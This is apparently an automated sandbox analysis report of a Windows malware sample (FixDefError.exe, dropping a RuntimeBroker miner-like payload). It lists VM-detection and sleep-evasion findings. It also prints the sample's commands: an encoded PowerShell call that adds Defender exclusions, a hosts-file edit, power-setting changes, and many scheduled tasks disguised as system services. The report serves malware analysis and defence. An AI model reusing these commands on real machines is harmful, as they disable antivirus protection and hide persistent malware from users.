Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\FixDefError.exe TID: 5892 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe TID: 5932 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe TID: 6068 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe TID: 5948 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4108 Thread sleep count: 9137 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5888 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe TID: 3988 Thread sleep time: -42200s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Dropped PE file which has not been started: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Dropped PE file which has not been started: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sys Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Dropped PE file which has not been started: C:\ProgramData\RuntimeBrokerData\svhost.exe Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\FixDefError.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9137 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Vmwaretrat
Source: ProgramStarter.exe, 00000001.00000002.349772100.0000000009B3D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
Source: powershell.exe, 00000004.00000003.465541531.000000000535F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V
Source: ProgramStarter.exe, 00000001.00000002.328304357.000000000448D000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vboxtray
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vboxservice
Source: ProgramStarter.exe, 00000001.00000002.349772100.0000000009B3D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareM3X57C89Win32_VideoControllerL7AUS5NSVideoController120060621000000.000000-0007926944.display.infMSBDAV33ZTS67PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsEWREGOHN99
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Vmware
Source: powershell.exe, 00000004.00000003.465541531.000000000535F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Vmtoolsd
Source: svchost.exe, 00000024.00000002.515586506.0000023C61E02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Vmwareuser
Source: svchost.exe, 00000024.00000002.516433522.0000023C61E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.516467984.000001EA20466000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.516600617.0000025B84229000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\FixDefError.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Modifies the hosts file
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Encrypted powershell cmdline option found
Source: C:\Windows\SysWOW64\cmd.exe Process created: Base64 decoded <#sUBvVIGpEJm#> Add-MpPreference <#kcITYcpBGLV#> -ExclusionPath <#jtGdzQcTEMOleJVpwil#> @( <#FoLTGYsFqsriYy#> $env:UserProfile, <#pKPevFFlRNiZEPXKhNI#> $env:ProgramData) <#QUBJyveKFT#> -Force <#IqcWqGFjRcMEhYsub#>
Source: C:\Windows\SysWOW64\cmd.exe Process created: Base64 decoded <#sUBvVIGpEJm#> Add-MpPreference <#kcITYcpBGLV#> -ExclusionPath <#jtGdzQcTEMOleJVpwil#> @( <#FoLTGYsFqsriYy#> $env:UserProfile, <#pKPevFFlRNiZEPXKhNI#> $env:ProgramData) <#QUBJyveKFT#> -Force <#IqcWqGFjRcMEhYsub#> Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /c powershell -encodedcommand "paajahmavqbcahyavgbjaecacabfaeoabqajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagsaywbjafqawqbjahaaqgbhaewavgajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiaa8acmaagb0aecazab6afeaywbuaeuatqbpagwazqbkafyacab3agkabaajad4aiabaacgaiaa8acmargbvaewavabhafkacwbgaheacwbyagkawqb5acmapgagacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaagadwaiwbwaesauablahyargbgagwaugboagkawgbfafaawablaggatgbjacmapgagacqazqbuahyaogbqahiabwbnahiayqbtaeqayqb0ageakqagadwaiwbrafuaqgbkahkadgblaesargbuacmapgagac0argbvahiaywblacaapaajaekacqbjafcacqbhaeyaagbsagmatqbfaggawqbzahuaygajad4a
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajahmavqbcahyavgbjaecacabfaeoabqajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagsaywbjafqawqbjahaaqgbhaewavgajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiaa8acmaagb0aecazab6afeaywbuaeuatqbpagwazqbkafyacab3agkabaajad4aiabaacgaiaa8acmargbvaewavabhafkacwbgaheacwbyagkawqb5acmapgagacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaagadwaiwbwaesauablahyargbgagwaugboagkawgbfafaawablaggatgbjacmapgagacqazqbuahyaogbqahiabwbnahiayqbtaeqayqb0ageakqagadwaiwbrafuaqgbkahkadgblaesargbuacmapgagac0argbvahiaywblacaapaajaekacqbjafcacqbhaeyaagbsagmatqbfaggawqbzahuaygajad4a"
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & schtasks /create /sc minute /mo 5 /tn "activationrule" /tr "c:\programdata\runtimebrokerdata\runtimebroker.exe" /rl highest /f
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /c powershell -encodedcommand "paajahmavqbcahyavgbjaecacabfaeoabqajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagsaywbjafqawqbjahaaqgbhaewavgajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiaa8acmaagb0aecazab6afeaywbuaeuatqbpagwazqbkafyacab3agkabaajad4aiabaacgaiaa8acmargbvaewavabhafkacwbgaheacwbyagkawqb5acmapgagacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaagadwaiwbwaesauablahyargbgagwaugboagkawgbfafaawablaggatgbjacmapgagacqazqbuahyaogbqahiabwbnahiayqbtaeqayqb0ageakqagadwaiwbrafuaqgbkahkadgblaesargbuacmapgagac0argbvahiaywblacaapaajaekacqbjafcacqbhaeyaagbsagmatqbfaggawqbzahuaygajad4a Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & schtasks /create /sc minute /mo 5 /tn "activationrule" /tr "c:\programdata\runtimebrokerdata\runtimebroker.exe" /rl highest /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajahmavqbcahyavgbjaecacabfaeoabqajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagsaywbjafqawqbjahaaqgbhaewavgajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiaa8acmaagb0aecazab6afeaywbuaeuatqbpagwazqbkafyacab3agkabaajad4aiabaacgaiaa8acmargbvaewavabhafkacwbgaheacwbyagkawqb5acmapgagacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaagadwaiwbwaesauablahyargbgagwaugboagkawgbfafaawablaggatgbjacmapgagacqazqbuahyaogbqahiabwbnahiayqbtaeqayqb0ageakqagadwaiwbrafuaqgbkahkadgblaesargbuacmapgagac0argbvahiaywblacaapaajaekacqbjafcacqbhaeyaagbsagmatqbfaggawqbzahuaygajad4a" Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\FixDefError.exe Process created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe "C:\Users\user\AppData\Local\Temp\ProgramStarter.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f Jump to behavior
